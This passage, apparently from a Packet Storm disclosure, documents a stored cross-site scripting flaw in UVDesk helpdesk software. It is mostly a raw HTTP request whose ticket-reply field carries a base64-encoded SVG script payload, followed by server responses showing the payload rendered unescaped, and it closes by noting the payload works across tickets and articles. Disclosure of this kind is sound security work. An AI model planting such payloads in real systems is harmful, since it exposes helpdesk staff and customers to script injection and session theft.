name="subject"aaaa------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="to[]"test@local.host------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="reply"%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="pic"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="nextView"stay------WebKitFormBoundaryXCjJcGbgZxZWLsSk-------------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Mon, 14 Aug 2023 11:33:26 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29X-Powered-By: PHP/7.4.29Cache-Control: max-age=0, must-revalidate, privateLocation: /uvdesk/public/en/member/ticket/view/1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,POST,PUT,OPTIONSAccess-Control-Allow-Headers: Access-Control-Allow-OriginAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Headers: Content-TypeX-Debug-Token: bf1b73X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73X-Robots-Tag: noindexExpires: Mon, 14 Aug 2023 11:33:26 GMTSet-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=laxConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 398<!DOCTYPE html><html>    <head>        <meta charset="UTF-8" />        <meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" />        <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title>    </head>    <body>        Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.    </body></html>-----------------------------------------------------------------------------------------------------------------------Redirect and view response:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Mon, 14 Aug 2023 11:44:14 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29X-Powered-By: PHP/7.4.29Cache-Control: max-age=0, must-revalidate, privateAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,POST,PUT,OPTIONSAccess-Control-Allow-Headers: Access-Control-Allow-OriginAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Headers: Content-TypeX-Debug-Token: 254ce8X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8X-Robots-Tag: noindexExpires: Mon, 14 Aug 2023 11:44:14 GMTConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 300607<!DOCTYPE html><html>    <head>        <title>#1 vvvvvvvvvvvvvvvvvvvvv</title>[...]<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p>[...]-----------------------------------------------------------------------------------------------------------------------XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.

Source

Packet Storm